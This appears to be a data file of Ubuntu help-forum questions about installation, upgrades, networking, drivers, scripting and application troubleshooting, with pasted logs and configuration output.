250105	thousands of pam_unix log entries in logwatch	my logwatch reports , within the cron section , contain thousands of entries like those below . how can i either reduce the number of log entries or have logwatch ignore them ? jan 30 18:49:01 ota3 cron [ 14054 ] : pam_unix ( cron : session ) : session opened for user zzz by ( uid=0 ) jan 30 18:49:03 ota3 cron [ 13055 ] : pam_unix ( cron : session ) : session closed for user root jan 30 18:49:08 ota3 cron [ 14054 ] : pam_unix ( cron : session ) : session closed for user zzz jan 30 18:50:01 ota3 cron [ 14108 ] : pam_unix ( cron : session ) : session opened for user zzzr by ( uid=0 )
250109	ca n't update to 11.04 from 10.10 . update manager and terminal not working ?	i re-installed ubuntu 10.10 a few days ago after it messed up trying to upgrade to 11.04 . i want to ultimately get it to 11.10 , but now it wo n't even attempt an upgrade and i get this error message : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/maverick-updates/universe/binary-i386/packages.gz 404 not found [ ip : 91.189.91.13 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/maverick-updates/multiverse/binary-i386/packages.gz 404 not found [ ip : 91.189.91.13 80 ] e : some index files failed to download , they have been ignored , or old ones used instead . i have no idea what i should do next . i do n't have a blank disc or a burner to download 11.10 manually . since i 'm new , i ca n't post the entire error code since there are so many hyperlinks .
250111	option for install ubuntu alongside window 7 not showing up	i am trying to install 12.10 alongside windows 7 , but i am not getting an option to do so . i just have a single partition unlike others with whom this problem usually exists . i read that this might be due to improper shutdown , but how many ever times i reboot , still i am not getting the option . any idea as to how i can get this back to normal functioning ? ubuntu @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 128.0 gb , 128035676160 bytes 240 heads , 63 sectors/track , 16539 cylinders , total 250069680 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6e96820e device boot start end blocks id system /dev/sda1 2048 249436159 124717056 7 hpfs/ntfs/exfat /dev/sda2 * 249436160 250050559 307200 7 hpfs/ntfs/exfat disk /dev/sdb : 1007 mb , 1007681536 bytes 9 heads , 8 sectors/track , 27335 cylinders , total 1968128 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf2c7259d device boot start end blocks id system /dev/sdb1 * 32 1968127 984048 6 fat16 ubuntu @ ubuntu : ~ $ sudo -parted -l matching defaults entries for ubuntu on this host : env_reset , mail_badpass , secure_path=/usr/local/sbin\ : /usr/local/bin\ : /usr/sbin\ : /usr/bin\ : /sbin\ : /bin user ubuntu may run the following commands on this host : ( all : all ) all ( all ) nopasswd : all ubuntu @ ubuntu : ~ $ ^c ubuntu @ ubuntu : ~ $
250114	not getting visual interface , just 'tty shell ' , after system update	i installed ubuntu unity 12.10 on my sony vaio and it was working well , until somewhere after installing the updates and installing unsettings , cairo dock and ubuntu-tweek-tool , a window displays saying that the system needs to restart . after restart ; ubuntu starts loading , but it only loads terminal tty ( it asks me for my user and password just as if it was the normal thing , but just in terminal . no visual interface ) . what can i do ? please help !
250119	apache server stops responding	i 'm using 11.10 64-bit desktop and i have apache installed for a personal site . i 'm experiencing a very strange behavior . when i startup apache my site works great for about an hour or so , but then when i try to access it after that point i get can not load page and server not responding . i can ping my site from my laptop . i have checked the error logs and there is nothing showing up at the time the server stops responding . oddly enough though when i surf the internet on the desktop i noticed that my site started to function normally again . once i stop surfing the internet the server will function normally for about another hour or so then stop responding , again with no error messages in the log file . restarting apache does not work but restarting the desktop does . i am at a loss as to what could be causing this behavior . how to fix this ?
250120	i ca n't dim my laptop 's light	i ca n't modify my laptop brightness . is it a bios problem ? it works in win 7 , but does n't work in ubuntu . it 's an acer aspire 5750-6842 laptop with intel hd graphics 3000 video chipset .
250123	why ca n't i install ubuntu on my hp pavilion g6	i recently bought an hp pavilion g6 , and i wanted to install ubuntu on it alongside with windows 7 , but it seems that it 's not compatible with my pc : / everytime i try to install it this screen appears then the screen turns off ( i tried both 12.04 32bit and 12.10 64 bit ) pavilion g6 1335 se -i5 2450m 2.5ghz amd radeon hd7450m 1go ram : 8go broadcom 802.11n broadcom 4.0 bluetooth adapter is there fix for this ?
250125	google earth 7 is not working ( no globe ) on lubuntu 12.10 32 bits	i have a netbook asus eee pc 1001 px ( intel atom n450 ) with lubuntu 12.10 32 bits installed . 3d is enabled and glxgears works well . but i am not able to use google earth 7 : i think that the problem is the same as here : http : //code.google.com/p/earth-issues/issues/detail ? id=1512 the application starts well but the globe is not shown , and everything else seem to work ( borders , 3d buildings , street view ) . how to solve that problem ? if there is no solution , where can i download a version 6.x of google earth for lubuntu ? ( i tried `` advanced configuration '' on the google earth website , and i clicked on the 6.2 version , but it downloads google-earth-stable which is 7.x ) .
250126	ubuntu variant with flash	is there a ubuntu variant that comes with flash pre-installed ? i used to use lubuntu , as chromium used to have it , but now it does n't work . the reason i want it pre-installed is that i use it a lot as a live cd . thanks
250128	ubuntu 12.04 ca n't play dvds with libdvdcss installed	i 've installed vlc , libdvdread4 , libdvdcss , medibuntu and ubuntu restricted extras and ran this line of code ... sudo /usr/share/doc/libdvdread4/install-css.sh ... on my ubuntu 12.04 but whenever i start a dvd , whether it be with or without dvd menus the vlc player does not play . when i run it without a dvd menu , i 'm returned with this ... playback failure : dvdread could not read -1/4 blocks at 0x01 . if i attempt to change the region set using regionset to 1 then i am returned with this ... error : region code could not be set ! i 've tried running the dvd on gnome mplayer to no avail . help me fix this .
250129	been trying for 13 hours to install cinelerra in my ubuntu 12.10 system	i have searched the internet all day and evening and tried many different ways that are offered but still can not get it on my computer . also my terminal does not allow me to put it there either it claims it needs a password but in my computer files there is none
250132	problem in pbuilder-dist raring create	when i run the command pbuilder-dist raring create in 32-bit ubuntu 12.04 it gives this output : http : //pastebin.com/qnqpjv6f and the error at the end of the file . i am able to install all softwares from synaptic and software centre . i have already run the following commands : sudo apt-get install gnupg pbuilder ubuntu-dev-tools bzr-builddeb apt-file sudo apt-get install packaging-dev please help me in rectifying the problem . thank you in advance .
250134	dedicated server in the cloud as media server with raspberry pi at home	i have an hosted server on ovh , it 's running my small website , owncloud to backup my photos , and a lot of mp4/h264 and avi/xvid . i would like to use it as a media server to stream video to my raspberry pi which is connected to my pc . now i 'm not sure about the approach i should have . the ubuntu server can stream h264 videos to a web browser , as i have install the appropriate apache mod . should the server simply share the videos as files , or should it stream , and in this case , what should i use on the pi to open the stream ? thanks in advance !
250136	ca n't compile a gtk+ program , errors in gtk-files	for years ago i downloaded gtk+-dev . now i would create a programm with gtk+ . simply startet with the example on http : //developer.gnome.org/gtk3/stable/gtk-getting-started.html , i get lots of errors ( more than 100 , 200 i think ) . compiled with gcc `pkg-config -- cflags gtk+-3.0` -o main main.c `pkg-config -- libs gtk+-3.0` that are the first messages before i stop the process with [ ctrl ] + [ c ] : in file included from /usr/include/gtk-3.0/gdk/gdk.h:31:0 , from /usr/include/gtk-3.0/gtk/gtk.h:30 , from main.c:1 : /usr/include/gtk-3.0/gdk/gdkversionmacros.h:137:6 : error : missing binary operator before token » ( « /usr/include/gtk-3.0/gdk/gdkversionmacros.h:145:5 : error : missing binary operator before token » ( « /usr/include/gtk-3.0/gdk/gdkversionmacros.h:148:5 : error : missing binary operator before token » ( « /usr/include/gtk-3.0/gdk/gdkversionmacros.h:154:5 : error : missing binary operator before token » ( « /usr/include/gtk-3.0/gdk/gdkversionmacros.h:162:5 : error : missing binary operator before token » ( « /usr/include/gtk-3.0/gdk/gdkversionmacros.h:168:5 : error : missing binary operator before token » ( « /usr/include/gtk-3.0/gdk/gdkversionmacros.h:176:5 : error : missing binary operator before token » ( « /usr/include/gtk-3.0/gdk/gdkversionmacros.h:182:5 : error : missing binary operator before token » ( « /usr/include/gtk-3.0/gdk/gdkversionmacros.h:190:5 : error : missing binary operator before token » ( « so there must be something wrong and i had the idea to `` reinstall '' gtk+ development files . but how can i do that ? which packages do i have to remove and install again ? here is the output for pkg-config -- cflags gtk+-3.0 : -pthread -i/usr/local/include/pango-1.0 -i/usr/local/include/gio-unix-2.0/ -i/usr/local/include/glib-2.0 -i/usr/local/lib/glib-2.0/include -i/usr/include/gtk-3.0 -i/usr/include/atk-1.0 -i/usr/include/cairo -i/usr/include/gdk-pixbuf-2.0 -i/usr/include/freetype2 -i/usr/include/pixman-1 -i/usr/include/libpng12 and pkg-config -- libs gtk+-3.0 gives : -pthread -l/usr/local/lib -lgtk-3 -lgdk-3 -latk-1.0 -lgio-2.0 -lpangocairo-1.0 -lgdk_pixbuf-2.0 -lcairo-gobject -lpango-1.0 -lcairo -lgobject-2.0 -lgmodule-2.0 -lgthread-2.0 -lrt -lglib-2.0 whats wrong with my gtk ? can i fix it or do i have to reinstall it ? informations [ edit ] : ubuntu-version : 12.04 ( precise ) ( 32-bit ) , linux 3.2.0-36-generic , gnome 3.4.2 installed with the package management system christoph
250137	unable to install ubuntu - kernel panic	i was installing ubuntu 12.10 but my computer shut down and every time i tried to install , showing the following :
250139	how to open other drive in ubuntu 12.10	i was able to open windows 7 files when i use ubuntu 12.04 . now when i use 12.10 i am not able to get it working . when i run the mount command i get this : /dev/sda5 on / type ext2 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) none on /run/user type tmpfs ( rw , noexec , nosuid , nodev , size=104857600 , mode=0755 ) gvfsd-fuse on /run/user/ankit/gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev , user=ankit ) gvfsd-fuse on /root/.gvfs type fuse.gvfsd-fuse ( rw , nosuid , nodev ) i have 2 more partitions on my computer one has a windows 7 installation and the second has some data . how i can got them working as they did in 12.04 ?
250141	ubuntu 12.04 basic questions	i 'm new in ubuntu and i have couple of questions . after trying ubuntu 12.04 in virtual machine a like it a lot and i 've decided to install ubuntu 12.04 as my second os ( dual boot win 7 and ubuntu 12.04.1 ) . questions are : how to resize swap ( i have 4 gb , i do not think that i need that much swap because i have 4 gb ram ) ? which update server to use ? it was set on us server by default and i set it to be main server . do i need partitions ? ( 100 used for ubuntu on hdd ) can i see other partitions used by windows ? my hdd i 500 gb , 400 for win and 100 gb for ubuntu . do i need antivirus program ( if i need some , which one to use ) , or any other protection ? i think that ubuntu uses more cpu power than win 7 , am i right ? ( cpu is amd athlox x 4 quad core , 2.6 ghz , win 7 i 64 bit and ubuntu 12.04 that i use is 32 bit ) . all comments and suggestions are welcome .
250144	ubuntu can not ping	i have two servers . os : ubuntu server 12.04 server1 : hp dl380 server2 : blade server ( it is not virtual machine ) server1 ip : 202.xxx.xxx.11 server2 ip : 202.xxx.xxx.25 server1 and server2 are in the same network segment and use the same switch but server1 can not connect to server2 , and server2 can not connect to server1 . how can i fix this issue ? server1 ping server2 ping 202.xxx.xxx.25 ( 202.xxx.xxx.25 ) 56 ( 84 ) bytes of data . from 202.xxx.xxx.11 icmp_seq=1 destination host unreachable server2 ping server1 ping 202.xxx.xxx.11 ( 202.xxx.xxx.11 ) 56 ( 84 ) bytes of data . from 202.xxx.xxx.25 icmp_seq=1 destination host unreachable server1 arp -a ? ( 202.a.b.c ) at 00:1a:64 : a1:2a:22 [ ether ] on eth0 ? ... ... nerver find server2 server2 arp -a ? ( 202.a.b.c ) at 00:1a:64 : a1:2a:22 [ ether ] on eth0 ? ( 202.xxx.xxx.11 ) at < incomplete > on eth0 # can not get server ip . config : server1 : # /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback auto eth0 # iface eth0 inet dhcp # auto eth1 # iface eth1 inet dhcp iface eth0 inet static address 202.xxx.xxx.11 netmask 255.255.255.128 gateway 202.xxx.xxx.1 dns-nameservers 202.xxx.xxx.xxx server2 : # /etc/network/interfaces # the loopback network interface auto lo iface lo inet loopback auto eth0 # iface eth0 inet dhcp # auto eth1 # iface eth1 inet dhcp iface eth0 inet static address 202.xxx.xxx.25 netmask 255.255.255.128 gateway 202.xxx.xxx.1 dns-nameservers 202.xxx.xxx.xxx server1 ifconfig eth0 link encap : ethernet hwaddr address inet addr:202.xxx.xxx.11 bcast:202.xxx.xxx.127 mask:255.255.255.128 inet6 addr : address scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:5528 errors:0 dropped:2352 overruns:0 frame:0 tx packets:8381 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:517812 ( 517.8 kb ) tx bytes:1095962 ( 1.0 mb ) interrupt:16 memory : f4000000-f4012800 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:2377 errors:0 dropped:0 overruns:0 frame:0 tx packets:2377 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:737914 ( 737.9 kb ) tx bytes:737914 ( 737.9 kb ) server2 ifconfig eth0 link encap : ethernet hwaddr address inet addr:202.xxx.xxx.25 bcast:202.xxx.xxx.127 mask:255.255.255.128 inet6 addr : address scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:6057 errors:0 dropped:723 overruns:0 frame:0 tx packets:7872 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:489060 ( 489.0 kb ) tx bytes:988220 ( 988.2 kb ) interrupt:16 memory : dfa00000-dfa20000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:285 errors:0 dropped:0 overruns:0 frame:0 tx packets:285 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:25222 ( 25.2 kb ) tx bytes:25222 ( 25.2 kb ) # manufacturer direct installation kvm , direct use default settings , no change virbr0 link encap : ethernet hwaddr 42:12:91 : df : da : ac up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) server1 lspci -nnk | grep -ia2 net 03:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme ii bcm5709 gi gabit ethernet [ 14e4:1639 ] ( rev 20 ) subsystem : hewlett-packard company nc382i integrated multi-port pci expr ess gigabit server adapter [ 103c:7055 ] kernel driver in use : bnx2 -- 03:00.1 ethernet controller [ 0200 ] : broadcom corporation netxtreme ii bcm5709 gi gabit ethernet [ 14e4:1639 ] ( rev 20 ) subsystem : hewlett-packard company nc382i integrated multi-port pci expr ess gigabit server adapter [ 103c:7055 ] kernel driver in use : bnx2 -- 04:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme ii bcm5709 gi gabit ethernet [ 14e4:1639 ] ( rev 20 ) subsystem : hewlett-packard company nc382i integrated multi-port pci expr ess gigabit server adapter [ 103c:7055 ] kernel driver in use : bnx2 -- 04:00.1 ethernet controller [ 0200 ] : broadcom corporation netxtreme ii bcm5709 gi gabit ethernet [ 14e4:1639 ] ( rev 20 ) subsystem : hewlett-packard company nc382i integrated multi-port pci expr ess gigabit server adapter [ 103c:7055 ] kernel driver in use : bnx2 server2 nection [ 8086:10d3 ] subsystem : super micro computer inc device [ 15d9:0000 ] kernel driver in use : e1000e -- 0a:00.0 ethernet controller [ 0200 ] : intel corporation 82574l gigabit network con nection [ 8086:10d3 ] subsystem : super micro computer inc device [ 15d9:0000 ] kernel driver in use : e1000e i can ping server1 and server2 on the internet .
250145	i have problems to install skype after a distro upgrade	i have numerous time updated the software center . upgraded the system using sudo apt-get upgrade and also sudo apt-get update . went through a lot of tutorials . downloaded skype from there site . tried to install through terminal . review this question . below are the details of my /etc/apt/sources.list file # deb cdrom : [ kubuntu 12.10 _quantal quetzal_ - release amd64 ( 20121017.1 ) ] / quantal main multiverse restricted universe # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //pk.archive.ubuntu.com/ubuntu/ quantal main restricted deb-src http : //pk.archive.ubuntu.com/ubuntu/ quantal main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //pk.archive.ubuntu.com/ubuntu/ quantal-updates main restricted deb-src http : //pk.archive.ubuntu.com/ubuntu/ quantal-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //pk.archive.ubuntu.com/ubuntu/ quantal universe deb-src http : //pk.archive.ubuntu.com/ubuntu/ quantal universe deb http : //pk.archive.ubuntu.com/ubuntu/ quantal-updates universe deb-src http : //pk.archive.ubuntu.com/ubuntu/ quantal-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //pk.archive.ubuntu.com/ubuntu/ quantal multiverse deb-src http : //pk.archive.ubuntu.com/ubuntu/ quantal multiverse deb http : //pk.archive.ubuntu.com/ubuntu/ quantal-updates multiverse deb-src http : //pk.archive.ubuntu.com/ubuntu/ quantal-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //pk.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb-src http : //pk.archive.ubuntu.com/ubuntu/ quantal-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu quantal-security main restricted deb-src http : //security.ubuntu.com/ubuntu quantal-security main restricted deb http : //security.ubuntu.com/ubuntu quantal-security universe deb-src http : //security.ubuntu.com/ubuntu quantal-security universe deb http : //security.ubuntu.com/ubuntu quantal-security multiverse deb-src http : //security.ubuntu.com/ubuntu quantal-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu quantal partner deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu quantal main deb http : //ubuntu.mirror.cambrium.nl/ubuntu/ hardy main deb-src http : //ubuntu.mirror.cambrium.nl/ubuntu/ hardy main deb-src http : //extras.ubuntu.com/ubuntu quantal main but still unable to install skype . it gives me the old fashioned several lib dependency errors . also when i try to install the .deb package downloaded from their site , it gives skype-bin error .
250146	intermittent slow intranet	i have a linux server ( centos 6.2 ) running apache2 , mysql and php . everything runs fine when accessing a page from any browser ( all clients are ubuntu 12.04 ) but begins to get slow after say about 2 hours . there will be delay of close to a minute before the page loads . this started about a week ago with the same number of users . so , am wondering what could be causing this delay ?
250147	opening skype chat history file	how to open skype chat history file in any editor . i have a file named file256.dbb
250149	how to defragment .iso to boot from it ?	when i try to boot from an iso ( ubuntu ) , i get iso for emulation should be in one continuous location how can i defragment the iso ?
250152	ubuntu hard disk is hidden in windows	i installed ubuntu 12.04 with windows in dual-boot mode in my acer laptop and it took 100gb partition for ubuntu . now while i 'm working with windows , it do n't show ubuntu partition . but in ubuntu it shows windows and others partitions also . i want to know is there a method to show ubuntu partition in windows ? because i want to use free space of ubuntu partition ... .
250153	alternate for mediascout	i have been using mediascout for processing and organizing my media , but recently i have moved my server to linux . is there any script or program available which allows me to do the same in linux ?
250157	dual boot ubuntu12.10 on windows 7	firstly i booted win 7 , then i wanted to boot ubuntu 12.10 on windows . i have ubuntu dvd and when i try to boot ubuntu and when i press `` install ubuntu '' proccess starts and laptop becomes like `` zombie '' dvd stops working and point under ubuntu logo stops moving . i have foloving partitions : 258 gb : ntfs on ( c : ) 322 gb : ntfs on ( d : ) 117 gb : free space . i tryed disk defragmentation and disk cleanup , but no sucsess installing ubuntu . please help me , what have to i do to install ubuntu ?
250162	running a script automatically just after login	i want to run a script automatically just after my login . please someone tell me how to do that . i tried putting path of the script into .bashrc , that did not work .
250165	how to get the forerunner 305 to work under ubuntu ?	i just recently installed ubuntu on our desktop pc and my father uses an forerunner 305 gps wristwatch when he goes out for a jog . on windows he always used the the program garmin trainingscenter to import the data gathered during his run ( things like the route he did , speed , distance etc. ) . i searched on internet and saw that pytrainer was a program which offered the same features and also had support for the forerunner 305 . so i installed it but when i press the `` import '' button , initially it looks like he is importing the data ( the forerunner gives a bleep and a progress bar is running ) . but when he is done , nothing shows up in the program . is there someone here who also has this gps watch and got it to work under ubuntu ? if so , is there something i am doing wrong ? i am using the latest version of pytrainer ( version 1.9.2-dev ) and `` gpsbabel '' ( a program needed to communicate with the watch ) that came with ubuntu 12.10 . update 7 februar ok , i just found something that could be considered as a small breakthrough . i was just experimenting and i tried an import via the garmin-forerunner-tools package instead of gpsbabel . although results did n't show up in pytrainer , it did create a .dump file in the ~/.pytrainer/tmp folder . i tried to manually import that file and that actually showed up in pytrainer ! : d alright , it 's a very dirty workaround but we at least know that communication and exporting works . now to just let pytrainer import automatically when i press the button
250168	android developer tools ( adt ) installation gives gtk errors when not run as sudo	i installed the android developer tools ( adt ) bundle , which includes the eclipse platform , using the official instructions . when i run the program from the command line i see this message 8 times : libdbusmenu-gtk-critical ** : watch_submenu : assertion `gtk_is_menu_shell ( menu ) ' failed when i exit i get : > ( adt:5170 ) : libdbusmenu-gtk-critical ** : watch_submenu : assertion 'gtk_is_menu_shell ( menu ) ' failed > ( adt:5170 ) : libdbusmenu-gtk-critical ** : watch_submenu : assertion 'gtk_is_menu_shell ( menu ) ' failed > ( adt:5170 ) : libdbusmenu-gtk-critical ** : watch_submenu : assertiongtk_is_menu_shell ( menu ) ' failed` > ( adt:5170 ) : libdbusmenu-gtk-critical ** : watch_submenu : assertion 'gtk_is_menu_shell ( menu ) ' failed > ( adt:5170 ) : libdbusmenu-gtk-critical ** : watch_submenu : assertion 'gtk_is_menu_shell ( menu ) ' failed > ( adt:5170 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . > ( adt:5170 ) : libdbusmenu-gtk-critical ** : watch_submenu : assertion 'gtk_is_menu_shell ( menu ) ' failed > ( adt:5170 ) : libdbusmenu-gtk-critical ** : watch_submenu : assertion 'gtk_is_menu_shell ( menu ) ' failed what is going wrong ? and should i expect adt to work normally , or with some errors , or with reduced functionality ? update when running as sudo : sudo adt-bundle-linux-x86_64/eclipse/eclipse there are no gtk errors . how can i run adt/eclipse without sudo and without running into the gtk errors ?
250171	logout scripts : not completed on shutdown , reboot	i 'm trying to do some stuff at logout , and the task can take up to 5 minutes to complete . if the user chooses power off or reboot directly , the script is killed before completion . if the user just chooses log out , the script is executed with no problems . i 've tried using pam_exec and lightdm property session-cleanup-script to point to my script , but it 's the same in both cases . the script used to do the testing is this one : # ! /bin/bash touch /tmpfile for p in $ ( seq 0 300 ) ; do sleep 1 echo $ p > > /tmpfile done when logging out , all the 300 numbers are written to the file . when shutting down or rebooting directly from within the user session , only 2 or 3 numbers are written , so the script is being killed . how is handled the shutdown by lightdm ? how can i ensure my script is not being killed ? if you propose an alternative approach , please take care that i need to know what user is being logged out and be able to run a script as that user . i also need to notify the user about what 's happening , so better stay on x if possible .
250174	how to i convert this bat file to install a game with it ?	bat file is following : @ echo off uharc x data.uha call restore.bat startw unpack.exe /nh startw inject.exe `` streams.wav '' startw regsetup.exe del data.uha > nul del uharc.exe > nul del startw.exe > nul del inject.exe > nul del restore.bat > nul echo -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - echo all done . < < < -- -- gndh -- -- > > > echo -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - so what i have to do to make it able to install this game ? and any tips if possible ? i have tried stuff on it , i have got other bat files running like tekkit server bat . but i ca n't think of anything i could do on it . is there any program other than wine/crossover that could run it ? when i use wine cmd it gives `` application could not be started . '' by renaming it to .sh i managed to get 5 or 6 sentences on it , but it still closes after half a second , like normally without changing anything .
250177	calibre server through computer name	i use calibre to manage my ebooks . caibre has a server option , which i can access on my ubuntu 12.10 machine through the link : http : //my_computer_name:8080 or through http : //my_ip_address:8080 . on another machine on the local network , i can access the server through the ip address but not through the computer name . since the ip address changes every time i connect , i wish to be able to connect through the computer name . how do i go about it ? some information : there 's a router which manages my network but i do not have much information on it , since i 'm not administrator of the network . however , both machines are on the same local network . cat /etc/hostname gives username-computer-name avahi-resolve -- name username-computer-name.local gives something like this : username-computer-name.local ff70 : :465d:57ef : fed5 : dd46 . ( what is this ? ) avahi-resolve -n username-computer-name.local gives my my 192.168.0.xxx ip address , the one assigned by the router . ping username-computer-name gives : 64 bytes from username-computer-name ( 127.0.1.1 ) : icmp_req=1 ttl=64 time=0.017 ms but my ip address accessible through the network is not 127.0.1.1 but 192.168.0.xxx . i can successfully ping the latter address as well .
250180	stop ubuntu keyboard shortcuts from `` resurrecting ''	i use a good deal of the default ubuntu shortcuts as shortcuts in emacs ( alt-space being the most important ) . i obviously have disabled these shortcuts in the keyboard shortcuts dialog , but for whatever reason they sometimes `` come back '' , generally after i 've installed/uninstalled certain packages , or upgraded ubuntu . my question therefore is : how do i keep these shortcuts disabled ? i do n't want shortcuts like alt-space restored for any reason .
250188	why does apt-get say i 'm out of disk space when i 'm not ?	update manager is trying to install `` linux-headers-3.2.0-36 '' . it is failing . i am trying to fix it with sudo apt-get install -f and it is saying there is insufficient disk space . there is 1.2gb av wailable according to system monitor . the terminal dialogue is shown below . alan @ alan-inspiron-1011 : ~ $ sudo apt-get install -f [ sudo ] password for alan : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : language-pack-zh-hans language-pack-kde-en linux-headers-3.2.0-29 language-pack-kde-zh-hans language-pack-kde-en-base kde-l10n-engb linux-headers-3.2.0-29-generic-pae kde-l10n-zhcn language-pack-zh-hans-base language-pack-kde-zh-hans-base use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-headers-3.2.0-36 the following new packages will be installed linux-headers-3.2.0-36 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . need to get 0 b/11.7 mb of archives . after this operation , 56.3 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 252837 files and directories currently installed . ) unpacking linux-headers-3.2.0-36 ( from ... /linux-headers-3.2.0-36_3.2.0-36.57_all.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-headers-3.2.0-36_3.2.0-36.57_all.deb ( -- unpack ) : error creating directory `./usr/src/linux-headers-3.2.0-36/drivers/rtc ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/linux-headers-3.2.0-36_3.2.0-36.57_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) alan @ alan-inspiron-1011 : ~ $ cd ./usr bash : cd : ./usr : no such file or directory alan @ alan-inspiron-1011 : ~ $ cd usr bash : cd : usr : no such file or directory alan @ alan-inspiron-1011 : ~ $ ^c alan @ alan-inspiron-1011 : ~ $
250191	ubuntu one oauth token - time of life	i try to develop some java application that works with ubuntu one account . everything is ok , i have access to my u1 space but i 'm not sure of one thing . how long may i use my oauth token ? has it some `` time of life '' just like facebook token ( about 60 days ) ?
250193	ca n't delete one of the partition on my disk	i am really messed up with one of my partitions . i am new to linux and created a 210gb huge partition as swap . i tried converting it to a regular ntfs partition , but my computer hanged up despite having 6gb of ram ( in system monitor i saw that at that time it was taking whole 6gb of ram and 4gb of swap memory ) , i had to turn off my computer since it was heating up . then i started computer again , tried to delete the swap partition but failed . i formatted it as ntfs and succeeded this time , then it is not mounting and giving me error error mounting : mount exited with exit code 21 : fuse : mount failed : device or resource busy after failing to mount it , i tried deleting it , but failed again , when i try to delete get the following error error erasing : helper exited with exit code 1 : in part_del_partition : device_file=/dev/sda , offset=115845627904 can anybody help please ?
250197	bash script generating image from video with specific title in subdirs	i have the following bash script generating a jpg file with the same name of the video file . now i need to change the bash script to generate the jpg file with the name image.jpg instead of with the same name of the video . i tried lots of different ways to do that but i 'm not really good in bash scripting and i have some problem with the basename and subdirectories . may you please help me ? # ! /bin/bash for i in */*.mp4 ; do j=`basename $ i .mp4` ; /usr/bin/ffmpeg -i `` $ i '' -r 1 -f image2 -vframes 1 -s 640x360 -ss 0:0:30 $ j.jpg ; done following the directory tree / /a/video1.mp4 /b/video2.mp4 /c/video3.mp4 following the result i need / /a/video1.mp4 /a/image.jpg /b/video2.mp4 /b/image.jp4 /c/video3.mp4 /c/image.jpg thank you very much !
250200	ultrasurf is not working in ubuntu	i would like to use `` ultrasurf '' software for ubuntu12.04..i installed wine , and when i 'm trying to open ultrasurf with wine , some of versions of ultrasurf 's saying some .dll files are missing . i replaced that files correctly in correct place . but still i have same problem . some of versions are not happennig anything ... i searched and did everthing i can . is there a way to run ultrasurf in ubuntu however correctly ?
